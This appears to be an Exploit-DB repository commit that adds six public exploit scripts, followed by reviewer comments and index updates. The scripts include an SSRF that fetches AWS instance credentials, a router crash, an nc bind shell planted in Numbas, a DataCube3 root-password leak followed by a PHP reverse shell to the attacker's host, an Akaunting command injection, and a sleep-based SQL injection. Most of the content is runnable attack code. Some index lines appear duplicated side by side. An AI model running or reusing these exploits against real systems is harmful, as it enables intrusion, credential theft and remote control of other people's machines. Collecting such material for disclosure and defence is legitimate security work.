DB: 2024-03-11

7 changes to exploits/shellcodes/ghdb

Ladder v0.0.21 - Server-side request forgery (SSRF)

TP-Link TL-WR740N - Buffer Overflow 'DOS'

Numbas < v7.3 - Remote Code Execution

Akaunting < 3.1.3 - RCE

DataCube3 v1.0 - Unrestricted file upload 'RCE'

Hide My WP < 6.2.9 - Unauthenticated SQLi
Exploit-DB 2024-03-11 00:16:24 +00:00
parent 0af7c5d561
commit 60a90afc8d
7 changed files with 537 additions and 0 deletions


@ -0,0 +1,18 @@
# Exploit Title: Ladder v0.0.21 - Server-side request forgery (SSRF)
# Date: 2024-01-20
# Exploit Author: @_chebuya
# Software Link: https://github.com/everywall/ladder
# Version: v0.0.1 - v0.0.21
# Tested on: Ubuntu 20.04.6 LTS on AWS EC2 (ami-0fd63e471b04e22d0)
# CVE: CVE-2024-27620
# Description: Ladder fails to apply sufficient default restrictions on destination addresses, allowing an attacker to make GET requests to addresses that would typically not be accessible from an external context. An attacker can access private address ranges, locally listening services, and cloud instance metadata APIs
import requests
import json
target_url = "http://127.0.0.1:8080/api/"
imdsv1_url = "http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance"
r = requests.get(target_url + imdsv1_url)
response_json = json.loads(r.text)
print(response_json["body"])
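Review bot: The header never says that the request built from `imdsv1_url` only succeeds against IMDSv1, which is the detail a defender needs to judge exposure. An instance that enforces IMDSv2 (`HttpTokens=required`) refuses a GET without a session token, and the description states that Ladder can only be made to issue GET requests. I would add a comment above that line such as `# Needs IMDSv1: IMDSv2-only instances reject GETs that carry no session token`. Separately, `requests.get(target_url + imdsv1_url)` has no `timeout` and its result goes straight into `json.loads(r.text)` and `response_json["body"]`, so a patched or unreachable proxy ends in a traceback instead of a clear negative result; `r = requests.get(target_url + imdsv1_url, timeout=10)` followed by `r.raise_for_status()` would make the outcome unambiguous.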


@ -0,0 +1,58 @@
# Exploit Title: TP-Link TL-WR740N - Buffer Overflow 'DOS'
# Date: 8/12/2023
# Exploit Author: Anish Feroz (ZEROXINN)
# Vendor Homepage: http://www.tp-link.com
# Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n
# Tested on: TP-Link TL-WR740N
#Description:
#There exist a buffer overflow vulnerability in TP-Link TL-WR740 router that can allow an attacker to crash the web server running on the router by sending a crafted request. To bring back the http (webserver), a user must physically reboot the router.
#Usage:
#python3 target username password
#change port, if required
------------------------------------------------POC-----------------------------------------
#!/usr/bin/python
import requests
from requests.auth import HTTPBasicAuth
import base64
def send_request(ip, username, password):
auth_url = f"http://{ip}:8082"
target_url = f"http://{ip}:8082/userRpm/PingIframeRpm.htm?ping_addr=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&doType=ping&isNew=new&sendNum=4&pSize=64&overTime=800&trHops=20"
credentials = f"{username}:{password}"
encoded_credentials = base64.b64encode(credentials.encode()).decode()
headers = {
"Host": f"{ip}:8082",
"Authorization": f"Basic {encoded_credentials}",
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Referer": f"http://{ip}:8082/userRpm/DiagnosticRpm.htm",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.9",
"Connection": "close"
}
session = requests.Session()
response = session.get(target_url, headers=headers)
if response.status_code == 200:
print("Server Crashed")
print(response.text)
else:
print(f"Script Completed with status code {response.status_code}")
ip_address = input("Enter IP address of the host: ")
username = input("Enter username: ")
password = input("Enter password: ")
send_request(ip_address, username, password)
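Review bot: The `#Usage:` comment (`#python3 target username password`) does not match the code, which takes no command-line arguments and prompts for host and credentials with `input()`; it should read something like `# Usage: python3 <script>  (prompts for host, username and password)`. The `----POC----` separator is not a Python comment and the `#!/usr/bin/python` line sits below it, so the file as stored will not run without editing, and the indentation appears to have been lost in this rendering as well. `HTTPBasicAuth` and `auth_url` are never used, and `session.get(...)` has no `timeout`. The `if response.status_code == 200` branch prints "Server Crashed" after the device has answered the request, so that message looks like an assumption rather than an observed crash; anyone using this to confirm a firmware fix should check the web interface separately.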


@ -0,0 +1,167 @@
# Exploit Title: Numbas < v7.3 - Remote Code Execution
# Google Dork: N/A
# Date: March 7th, 2024
# Exploit Author: Matheus Boschetti
# Vendor Homepage: https://www.numbas.org.uk/
# Software Link: https://github.com/numbas/Numbas
# Version: 7.2 and below
# Tested on: Linux
# CVE: CVE-2024-27612
import sys, requests, re, argparse, subprocess, time
from bs4 import BeautifulSoup
s = requests.session()
def getCSRF(target):
url = f"http://{target}/"
req = s.get(url)
soup = BeautifulSoup(req.text, 'html.parser')
csrfmiddlewaretoken = soup.find('input', attrs={'name': 'csrfmiddlewaretoken'})['value']
return csrfmiddlewaretoken
def createTheme(target):
# Format request
csrfmiddlewaretoken = getCSRF(target)
theme = 'ExampleTheme'
boundary = '----WebKitFormBoundaryKUMXsLP31HzARUV1'
data = (
f'--{boundary}\r\n'
'Content-Disposition: form-data; name="csrfmiddlewaretoken"\r\n'
'\r\n'
f'{csrfmiddlewaretoken}\r\n'
f'--{boundary}\r\n'
'Content-Disposition: form-data; name="name"\r\n'
'\r\n'
f'{theme}\r\n'
f'--{boundary}--\r\n'
)
headers = {'Content-Type': f'multipart/form-data; boundary={boundary}',
'User-Agent': 'Mozilla/5.0',
'Accept': '*/*',
'Connection': 'close'}
# Create theme and return its ID
req = s.post(f"http://{target}/theme/new/", headers=headers, data=data)
redir = req.url
split = redir.split('/')
id = split[4]
print(f"\t[i] Theme created with ID {id}")
return id
def login(target, user, passwd):
print("\n[i] Attempting to login...")
csrfmiddlewaretoken = getCSRF(target)
data = {'csrfmiddlewaretoken': csrfmiddlewaretoken,
'username': user,
'password': passwd,
'next': '/'}
# Login
login = s.post(f"http://{target}/login/", data=data, allow_redirects=True)
res = login.text
if("Logged in as" not in res):
print("\n\n[!] Login failed!")
sys.exit(-1)
# Check if logged and fetch ID
usermatch = re.search(r'Logged in as <strong>(.*?)</strong>', res)
if usermatch:
user = usermatch.group(1)
idmatch = re.search(r'<a href="/accounts/profile/(.*?)/"><span class="glyphicon glyphicon-user">', res)
if idmatch:
id = idmatch.group(1)
print(f"\t[+] Logged in as \"{user}\" with ID {id}")
def checkVuln(url):
print("[i] Checking if target is vulnerable...")
# Attempt to read files
themeID = createTheme(url)
target = f"http://{url}/themes/{themeID}/edit_source?filename=../../../../../../../../../.."
hname = s.get(f"{target}/etc/hostname")
ver = s.get(f"{target}/etc/issue")
hnamesoup = BeautifulSoup(hname.text, 'html.parser')
versoup = BeautifulSoup(ver.text, 'html.parser')
hostname = hnamesoup.find('textarea').get_text().strip()
version = versoup.find('textarea').get_text().strip()
if len(hostname) < 1:
print("\n\n[!] Something went wrong - target might not be vulnerable.")
sys.exit(-1)
print(f"\n[+] Target \"{hostname}\" is vulnerable!")
print(f"\t[i] Running: \"{version}\"")
# Cleanup - delete theme
print(f"\t\t[i] Cleanup: deleting theme {themeID}...")
target = f"http://{url}/themes/{themeID}/delete"
csrfmiddlewaretoken = getCSRF(url)
data = {'csrfmiddlewaretoken':csrfmiddlewaretoken}
s.post(target, data=data)
def replaceInit(target):
# Overwrite __init__.py with arbitrary code
rport = '8443'
payload = f"import subprocess;subprocess.Popen(['nc','-lnvp','{rport}','-e','/bin/bash'])"
csrfmiddlewaretoken = getCSRF(target)
filename = '../../../../numbas_editor/numbas/__init__.py'
themeID = createTheme(target)
data = {'csrfmiddlewaretoken': csrfmiddlewaretoken,
'source': payload,
'filename': filename}
print("[i] Delivering payload...")
# Retry 5 times in case something goes wrong...
for attempt in range(5):
try:
s.post(f"http://{target}/themes/{themeID}/edit_source", data=data, timeout=10)
except Exception as e:
pass
# Establish connection to bind shell
time.sleep(2)
print(f"\t[+] Payload delivered, establishing connection...\n")
if ":" in target:
split = target.split(":")
ip = split[0]
else:
ip = str(target)
subprocess.Popen(["nc", "-n", ip, rport])
while True:
pass
def main():
parser = argparse.ArgumentParser()
if len(sys.argv) <= 1:
print("\n[!] No option provided!")
print("\t- check: Passively check if the target is vulnerable by attempting to read files from disk\n\t- exploit: Attempt to actively exploit the target\n")
print(f"[i] Usage: python3 {sys.argv[0]} <option> --target 172.16.1.5:80 --user example --passwd qwerty")
sys.exit(-1)
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('action', nargs='?', choices=['check', 'exploit'], help='Action to perform: check or exploit')
parser.add_argument('--target', help='Target IP:PORT')
parser.add_argument('--user', help='Username to authenticate')
parser.add_argument('--passwd', help='Password to authenticate')
args = parser.parse_args()
action = args.action
target = args.target
user = args.user
passwd = args.passwd
print("\n\t\t-==[ CVE-2024-27612: Numbas Remote Code Execution (RCE) ]==-")
if action == 'check':
login(target, user, passwd)
checkVuln(target)
elif action == 'exploit':
login(target, user, passwd)
replaceInit(target)
else:
sys.exit(-1)
if __name__ == "__main__":
main()
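Review bot: `replaceInit` replaces `numbas_editor/numbas/__init__.py` with the one-line payload and never restores it, whereas `checkVuln` deletes the theme it creates; the header should say that the `exploit` action is destructive and leaves a listener on port 8443 that accepts any connection until the host is cleaned up. A comment at the top of the file such as `# 'exploit' overwrites numbas/__init__.py and opens an unauthenticated listener on 8443: lab use only, restore the file afterwards` would cover it. The retry loop's `except Exception as e: pass` hides every failure, so "Payload delivered" is printed even when all five POSTs fail. For defenders, the indicators visible in this code are `edit_source` requests whose `filename` contains `../` and an `nc` process started from the editor's Python process; the title implies the fix is in v7.3, though the page does not state it.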


@ -0,0 +1,145 @@
# Exploit Title: DataCube3 v1.0 - Unrestricted file upload 'RCE'
# Date: 7/28/2022
# Exploit Author: Samy Younsi - NS Labs (https://neroteam.com)
# Vendor Homepage: https://www.f-logic.jp
# Software Link: https://www.f-logic.jp/pdf/support/manual_product/manual_product_datacube3_ver1.0_sc.pdf
# Version: Ver1.0
# Tested on: DataCube3 version 1.0 (Ubuntu)
# CVE : CVE-2024-25830 + CVE-2024-25832
# Exploit chain reverse shell, information disclosure (root password leak) + unrestricted file upload
from __future__ import print_function, unicode_literals
from bs4 import BeautifulSoup
import argparse
import requests
import json
import urllib3
import re
urllib3.disable_warnings()
def banner():
dataCube3Logo = """
▒▒▒▒▒▒████████████████████████████████████▓▓▓▓▓▓▓▓
▒▒▒▒▒▒▒▒██ DataCube3 Ver1.0 █F-logic▓▓
▒▒████▒▒██ ████ ████ ██▓▓▓▓▓▓▓▓
▒▒████▒▒██ ████ ████ ██▓▓▓▓▓▓▓▓
▒▒▒▒▒▒▒▒██ ████ ████ ██▓▓▓▓▓▓▓▓
▒▒▒▒▒▒▒▒██ ██▓▓████▓▓
▒▒▒▒▒▒▒▒██ ██ ██ ██▓▓████▓▓
▒▒▒▒▒▒▒▒██ █████████████████ ██▓▓▓▓▓▓▓▓
▒▒▒▒▒▒████████████████████████████████████▓▓▓▓▓▓
\033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m \033[1;91mDataCube3 exploit chain reverse shell\033[1;m
FOR EDUCATIONAL PURPOSE ONLY.
"""
return print('\033[1;94m{}\033[1;m'.format(dataCube3Logo))
def extractRootPwd(RHOST, RPORT, protocol):
url = '{}://{}:{}/admin/config_all.php'.format(protocol, RHOST, RPORT)
try:
response = requests.get(url, allow_redirects=False, verify=False, timeout=20)
if response.status_code != 302:
print('[!] \033[1;91mError: DataCube3 web interface is not reachable. Make sure the specified IP is correct.\033[1;m')
exit()
soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser')
scriptTag = str(soup.find_all('script')[12]).replace(' ', '')
rawLeakedData = re.findall('configData:.*,', scriptTag)[0]
jsonLeakedData = json.loads('[{}]'.format(rawLeakedData.split('configData:[')[1].split('],')[0]))
adminPassword = jsonLeakedData[12]['value']
rootPassword = jsonLeakedData[14]['value']
print('[INFO] DataCube3 leaked credentials successfully extracted: admin:{} | root:{}.\n[INFO] The target must be vulnerable.'.format(adminPassword, rootPassword))
return rootPassword
except:
print('[ERROR] Can\'t grab the DataCube3 version...')
def generateAuthCookie(RHOST, RPORT, protocol, rootPassword):
print('[INFO] Generating DataCube3 auth cookie ...')
url = '{}://{}:{}/admin/config_all.php'.format(protocol, RHOST, RPORT)
data = {
'user_id': 'root',
'user_pw': rootPassword,
'login': '%E3%83%AD%E3%82%B0%E3%82%A4%E3%83%B3'
}
try:
response = requests.post(url, data=data, allow_redirects=False, verify=False, timeout=20)
if response.status_code != 302:
print('[!] \033[1;91mError: An error occur while trying to get the auth cookie, is the root password correct?\033[1;m')
exit()
authCookie = response.cookies.get_dict()
print('[INFO] Authentication successful! Auth Cookie: {}'.format(authCookie))
return authCookie
except:
print('[ERROR] Can\'t grab the auth cookie, is the root password correct?')
def extractAccesstime(RHOST, RPORT, LHOST, LPORT, protocol, authCookie):
print('[INFO] Extracting Accesstime ...')
url = '{}://{}:{}/admin/setting_photo.php'.format(protocol, RHOST, RPORT)
try:
response = requests.get(url, cookies=authCookie, allow_redirects=False, verify=False, timeout=20)
if response.status_code != 302:
print('[!] \033[1;91mError: An error occur while trying to get the accesstime value.\033[1;m')
exit()
soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser')
accessTime = soup.find('input', {'name': 'accesstime'}).get('value')
print('[INFO] AccessTime value: {}'.format(accessTime))
return accessTime
except:
print('[ERROR] Can\'t grab the accesstime value, is the root password correct?')
def injectReverseShell(RHOST, RPORT, LHOST, LPORT, protocol, authCookie, accessTime):
print('[INFO] Injecting PHP reverse shell script ...')
filename='rvs.php'
payload = '<?php $sock=fsockopen("{}",{});$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);?>'.format(LHOST, LPORT)
data = '-----------------------------113389720123090127612523184396\r\nContent-Disposition: form-data; name="add"\r\n\r\nå<6E><C3A5>ç<EFBFBD><C3A7>追å<C2BD>\xA0\r\n-----------------------------113389720123090127612523184396\r\nContent-Disposition: form-data; name="addPhoto"; filename="{}"\r\nContent-Type: image/jpeg\r\n\r\n{}\r\n-----------------------------113389720123090127612523184396\r\nContent-Disposition: form-data; name="accesstime"\r\n\r\n{}\r\n-----------------------------113389720123090127612523184396--\r\n'.format(filename, payload, accessTime)
headers = {
'Content-Type': 'multipart/form-data; boundary=---------------------------113389720123090127612523184396'
}
url = '{}://{}:{}/admin/setting_photo.php'.format(protocol, RHOST, RPORT)
try:
response = requests.post(url, cookies=authCookie, headers=headers, data=data, allow_redirects=False, verify=False, timeout=20)
if response.status_code != 302:
print('[!] \033[1;91mError: An error occur while trying to upload the PHP reverse shell script.\033[1;m')
exit()
shellURL = '{}://{}:{}/images/slideshow/{}'.format(protocol, RHOST, RPORT, filename)
print('[INFO] PHP reverse shell script successfully uploaded!\n[INFO] SHELL URL: {}'.format(shellURL))
return shellURL
except:
print('[ERROR] Can\'t upload the PHP reverse shell script, is the root password correct?')
def execReverseShell(shellURL):
print('[INFO] Executing reverse shell...')
try:
response = requests.get(shellURL, allow_redirects=False, verify=False)
print('[INFO] Reverse shell successfully executed.')
return
except Exception as e:
print('[ERROR] Reverse shell failed. Make sure the DataCube3 device can reach the host {}:{}')
return False
def main():
banner()
args = parser.parse_args()
protocol = 'https' if args.RPORT == 443 else 'http'
rootPassword = extractRootPwd(args.RHOST, args.RPORT, protocol)
authCookie = generateAuthCookie(args.RHOST, args.RPORT, protocol, rootPassword)
accessTime = extractAccesstime(args.RHOST, args.RPORT, args.LHOST, args.LPORT, protocol, authCookie)
shellURL = injectReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT, protocol, authCookie, accessTime)
execReverseShell(shellURL)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Script PoC that exploit an unauthenticated remote command injection on f-logic DataCube3 devices.', add_help=False)
parser.add_argument('--RHOST', help='Refers to the IP of the target machine. (f-logic DataCube3 device)', type=str, required=True)
parser.add_argument('--RPORT', help='Refers to the open port of the target machine. (443 by default)', type=int, required=True)
parser.add_argument('--LHOST', help='Refers to the IP of your machine.', type=str, required=True)
parser.add_argument('--LPORT', help='Refers to the open port of your machine.', type=int, required=True)
main()
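Review bot: Every helper wraps its request in a bare `except:`, and because `exit()` raises `SystemExit` the intended aborts inside those `try` blocks are caught too: the helper prints its generic error, returns `None`, and `main()` carries on with `None` as password, cookie or access time. Catching `requests.RequestException` (plus the `IndexError`/`KeyError` the parsing can raise) instead of a bare `except:` would let the aborts work. In `execReverseShell` the error string ending in `{}:{}` is printed without `.format(...)`, so the placeholders appear literally. The script also prints the recovered admin and root passwords and the session cookie to stdout, so terminal logs from a test should be handled as secrets. From the `status_code != 302` check followed by parsing `response.content`, the disclosure seems to be configuration data sent in the body of the redirect from `/admin/config_all.php`; a header comment saying so would tell device owners what to look for in responses.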


@ -0,0 +1,122 @@
# Exploit Title: Akaunting < 3.1.3 - RCE
# Date: 08/02/2024
# Exploit Author: u32i@proton.me
# Vendor Homepage: https://akaunting.com
# Software Link: https://github.com/akaunting/akaunting
# Version: <= 3.1.3
# Tested on: Ubuntu (22.04)
# CVE : CVE-2024-22836
#!/usr/bin/python3
import sys
import re
import requests
import argparse
def get_company():
# print("[INF] Retrieving company id...")
res = requests.get(target, headers=headers, cookies=cookies, allow_redirects=False)
if res.status_code != 302:
print("[ERR] No company id was found!")
sys.exit(3)
cid = res.headers['Location'].split('/')[-1]
if cid == "login":
print("[ERR] Invalid session cookie!")
sys.exit(7)
return cid
def get_tokens(url):
res = requests.get(url, headers=headers, cookies=cookies, allow_redirects=False)
search_res = re.search(r"\"csrfToken\"\:\".*\"", res.text)
if not search_res:
print("[ERR] Couldn't get csrf token")
sys.exit(1)
data = {}
data['csrf_token'] = search_res.group().split(':')[-1:][0].replace('"', '')
data['session'] = res.cookies.get('akaunting_session')
return data
def inject_command(cmd):
url = f"{target}/{company_id}/wizard/companies"
tokens = get_tokens(url)
headers.update({"X-Csrf-Token": tokens['csrf_token']})
data = {"_token": tokens['csrf_token'], "_method": "POST", "_prefix": "company", "locale": f"en_US && {cmd}"}
res = requests.post(url, headers=headers, cookies=cookies, json=data, allow_redirects=False)
if res.status_code == 200:
res_data = res.json()
if res_data['error']:
print("[ERR] Command injection failed!")
sys.exit(4)
print("[INF] Command injected!")
def trigger_rce(app, version = "1.0.0"):
print("[INF] Executing the command...")
url = f"{target}/{company_id}/apps/install"
data = {"alias": app, "version": version, "path": f"apps/{app}/download"}
headers.update({"Content-Type":"application/json"})
res = requests.post(url, headers=headers, cookies=cookies, json=data, allow_redirects=False)
if res.status_code == 200:
res_data = res.json()
if res_data['error']:
search_res = re.search(r">Exit Code\:.*<", res_data['message'])
if search_res:
print("[ERR] Failed to execute the command")
sys.exit(6)
print("[ERR] Failed to install the app! no command was executed!")
sys.exit(5)
print("[INF] Executed successfully!")
def login(email, password):
url = f"{target}/auth/login"
tokens = get_tokens(url)
cookies.update({
'akaunting_session': tokens['session']
})
data = {
"_token": tokens['csrf_token'],
"_method": "POST",
"email": email,
"password": password
}
req = requests.post(url, headers=headers, cookies=cookies, data=data)
res = req.json()
if res['error']:
print("[ERR] Failed to log in!")
sys.exit(8)
print("[INF] Logged in")
cookies.update({'akaunting_session': req.cookies.get('akaunting_session')})
def main():
inject_command(args.command)
trigger_rce(args.alias, args.version)
if __name__=='__main__':
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", help="target url")
parser.add_argument("--email", help="user login email.")
parser.add_argument("--password", help="user login password.")
parser.add_argument("-i", "--id", type=int, help="company id (optional).")
parser.add_argument("-c", "--command", help="command to execute.")
parser.add_argument("-a", "--alias", help="app alias, default: paypal-standard", default="paypal-standard")
parser.add_argument("-av", "--version", help="app version, default: 3.0.2", default="3.0.2")
args = parser.parse_args()
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36"}
cookies = {}
target = args.url
try:
login(args.email, args.password)
company_id = get_company() if not args.id else args.id
main()
except:
sys.exit(0)
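Review bot: The header is inconsistent about the affected range: the title says `Akaunting < 3.1.3` while the `# Version:` line says `<= 3.1.3`, so a reader cannot tell whether 3.1.3 itself is affected; one of the two lines should be corrected against the CVE-2024-22836 advisory. The `--version` help text advertises a default of 3.0.2, which is what argparse passes, so the `version = "1.0.0"` default on `trigger_rce` is dead and misleading. The closing `except: sys.exit(0)` also catches the `SystemExit` raised by every `sys.exit(1)` to `sys.exit(8)` in the helpers, so the script always exits 0 and the distinct error codes are lost; `except requests.RequestException:` with a non-zero exit would preserve them. From the `"locale": f"en_US && {cmd}"` field, the root cause appears to be the locale value reaching a shell command unescaped, which is worth stating in the header for anyone writing a detection on that request.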


@ -0,0 +1,21 @@
# Exploit Title: Wordpress Plugin Hide My WP < 6.2.9 - Unauthenticated SQLi
# Publication Date: 2023-01-11
# Original Researcher: Xenofon Vassilakopoulos
# Exploit Author: Xenofon Vassilakopoulos
# Submitter: Xenofon Vassilakopoulos
# Vendor Homepage: https://wpwave.com/
# Version: Hide My WP v6.2.8 and prior
# Tested on: Hide My WP v6.2.7
# Impact: Database Access
# CVE: CVE-2022-4681
# CWE: CWE-89
# CVSS Score: 8.6 (high)
## Description
The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.
## Proof of Concept
curl -k --location --request GET "http://localhost:10008" --header "X-Forwarded-For: 127.0.0.1'+(select*from(select(sleep(20)))a)+'"
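Review bot: The description speaks of "a parameter", but the proof of concept carries the payload in the `X-Forwarded-For` request header, and the text gives no remediation; both matter to a defender, because filtering and log review aimed at query or body parameters would miss a header. I would add a line such as `Vector: X-Forwarded-For request header` under Description and a `## Remediation` line pointing to the fixed release, which the title implies is 6.2.9. The `-k` option in the curl line has no effect on an `http://` URL and can be dropped.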


@ -2901,6 +2901,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
46508,exploits/freebsd_x86-64/local/46508.rb,"FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)",2019-03-07,Metasploit,local,freebsd_x86-64,,2019-03-07,2019-03-07,1,CVE-2012-0217,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/468679f9074ee4a7de7624d3440ff6e7f65cf9c2/modules/exploits/freebsd/local/intel_sysret_priv_esc.rb 46508,exploits/freebsd_x86-64/local/46508.rb,"FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)",2019-03-07,Metasploit,local,freebsd_x86-64,,2019-03-07,2019-03-07,1,CVE-2012-0217,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/468679f9074ee4a7de7624d3440ff6e7f65cf9c2/modules/exploits/freebsd/local/intel_sysret_priv_esc.rb
46508,exploits/freebsd_x86-64/local/46508.rb,"FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)",2019-03-07,Metasploit,local,freebsd_x86-64,,2019-03-07,2019-03-07,1,CVE-2012-0217,Local,,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/468679f9074ee4a7de7624d3440ff6e7f65cf9c2/modules/exploits/freebsd/local/intel_sysret_priv_esc.rb 46508,exploits/freebsd_x86-64/local/46508.rb,"FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)",2019-03-07,Metasploit,local,freebsd_x86-64,,2019-03-07,2019-03-07,1,CVE-2012-0217,Local,,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/468679f9074ee4a7de7624d3440ff6e7f65cf9c2/modules/exploits/freebsd/local/intel_sysret_priv_esc.rb
51257,exploits/go/webapps/51257.py,"Answerdev 1.0.3 - Account Takeover",2023-04-05,"Eduardo Pérez-Malumbres Cervera",webapps,go,,2023-04-05,2023-04-27,1,CVE-2023-0744,,,,, 51257,exploits/go/webapps/51257.py,"Answerdev 1.0.3 - Account Takeover",2023-04-05,"Eduardo Pérez-Malumbres Cervera",webapps,go,,2023-04-05,2023-04-27,1,CVE-2023-0744,,,,,
51869,exploits/go/webapps/51869.txt,"Ladder v0.0.21 - Server-side request forgery (SSRF)",2024-03-10,@_chebuya,webapps,go,,2024-03-10,2024-03-10,0,CVE-2024-27620,,,,,
51734,exploits/go/webapps/51734.py,"Minio 2022-07-29T19-40-48Z - Path traversal",2023-10-09,"Jenson Zhao",webapps,go,,2023-10-09,2023-10-09,0,CVE-2022-35919,,,,, 51734,exploits/go/webapps/51734.py,"Minio 2022-07-29T19-40-48Z - Path traversal",2023-10-09,"Jenson Zhao",webapps,go,,2023-10-09,2023-10-09,0,CVE-2022-35919,,,,,
51497,exploits/go/webapps/51497.txt,"Pydio Cells 4.1.2 - Cross-Site Scripting (XSS) via File Download",2023-05-31,"RedTeam Pentesting GmbH",webapps,go,,2023-05-31,2023-05-31,0,CVE-2023-32751,,,,, 51497,exploits/go/webapps/51497.txt,"Pydio Cells 4.1.2 - Cross-Site Scripting (XSS) via File Download",2023-05-31,"RedTeam Pentesting GmbH",webapps,go,,2023-05-31,2023-05-31,0,CVE-2023-32751,,,,,
51498,exploits/go/webapps/51498.txt,"Pydio Cells 4.1.2 - Server-Side Request Forgery",2023-05-31,"RedTeam Pentesting GmbH",webapps,go,,2023-05-31,2023-05-31,0,CVE-2023-32750,,,,, 51498,exploits/go/webapps/51498.txt,"Pydio Cells 4.1.2 - Server-Side Request Forgery",2023-05-31,"RedTeam Pentesting GmbH",webapps,go,,2023-05-31,2023-05-31,0,CVE-2023-32750,,,,,
@ -4919,6 +4920,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
47483,exploits/hardware/webapps/47483.py,"TP-Link TL-WR1043ND 2 - Authentication Bypass",2019-10-10,"Uriel Kosayev",webapps,hardware,80,2019-10-10,2019-10-10,0,CVE-2019-6971,"Authentication Bypass / Credentials Bypass (AB/CB)",,,, 47483,exploits/hardware/webapps/47483.py,"TP-Link TL-WR1043ND 2 - Authentication Bypass",2019-10-10,"Uriel Kosayev",webapps,hardware,80,2019-10-10,2019-10-10,0,CVE-2019-6971,"Authentication Bypass / Credentials Bypass (AB/CB)",,,,
34583,exploits/hardware/webapps/34583.txt,"TP-Link TL-WR340G / TL-WR340GD - Multiple Vulnerabilities",2014-09-08,smash,webapps,hardware,80,2014-09-09,2014-09-09,0,OSVDB-111720;OSVDB-111712;OSVDB-111711;OSVDB-111708;OSVDB-111707;OSVDB-111706;OSVDB-111705;OSVDB-111704;OSVDB-111703;OSVDB-100357;OSVDB-100355,,,,, 34583,exploits/hardware/webapps/34583.txt,"TP-Link TL-WR340G / TL-WR340GD - Multiple Vulnerabilities",2014-09-08,smash,webapps,hardware,80,2014-09-09,2014-09-09,0,OSVDB-111720;OSVDB-111712;OSVDB-111711;OSVDB-111708;OSVDB-111707;OSVDB-111706;OSVDB-111705;OSVDB-111704;OSVDB-111703;OSVDB-100357;OSVDB-100355,,,,,
51606,exploits/hardware/webapps/51606.txt,"TP-Link TL-WR740N - Authenticated Directory Transversal",2023-07-19,"Anish Feroz",webapps,hardware,,2023-07-19,2023-07-19,0,,,,,, 51606,exploits/hardware/webapps/51606.txt,"TP-Link TL-WR740N - Authenticated Directory Transversal",2023-07-19,"Anish Feroz",webapps,hardware,,2023-07-19,2023-07-19,0,,,,,,
51866,exploits/hardware/webapps/51866.txt,"TP-Link TL-WR740N - Buffer Overflow 'DOS'",2024-03-10,"Anish Feroz",webapps,hardware,,2024-03-10,2024-03-10,0,,,,,,
43148,exploits/hardware/webapps/43148.txt,"TP-Link TL-WR740N - Cross-Site Scripting",2017-11-16,bl00dy,webapps,hardware,,2017-11-16,2017-11-16,0,,,,,, 43148,exploits/hardware/webapps/43148.txt,"TP-Link TL-WR740N - Cross-Site Scripting",2017-11-16,bl00dy,webapps,hardware,,2017-11-16,2017-11-16,0,,,,,,
51769,exploits/hardware/webapps/51769.txt,"TP-LINK TL-WR740N - Multiple HTML Injection",2024-02-02,"Shujaat Amin (ZEROXINN)",webapps,hardware,,2024-02-02,2024-02-02,0,,,,,, 51769,exploits/hardware/webapps/51769.txt,"TP-LINK TL-WR740N - Multiple HTML Injection",2024-02-02,"Shujaat Amin (ZEROXINN)",webapps,hardware,,2024-02-02,2024-02-02,0,,,,,,
51768,exploits/hardware/webapps/51768.txt,"TP-Link TL-WR740N - UnAuthenticated Directory Transversal",2024-02-02,"Syed Affan Ahmed (ZEROXINN)",webapps,hardware,,2024-02-02,2024-02-02,0,,,,,, 51768,exploits/hardware/webapps/51768.txt,"TP-Link TL-WR740N - UnAuthenticated Directory Transversal",2024-02-02,"Syed Affan Ahmed (ZEROXINN)",webapps,hardware,,2024-02-02,2024-02-02,0,,,,,,
@ -12383,6 +12385,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
43922,exploits/nodejs/webapps/43922.html,"KeystoneJS < 4.0.0-beta.7 - Cross-Site Request Forgery",2018-01-28,"Saurabh Banawar",webapps,nodejs,,2018-01-28,2018-01-28,0,CVE-2017-16570,,,,, 43922,exploits/nodejs/webapps/43922.html,"KeystoneJS < 4.0.0-beta.7 - Cross-Site Request Forgery",2018-01-28,"Saurabh Banawar",webapps,nodejs,,2018-01-28,2018-01-28,0,CVE-2017-16570,,,,,
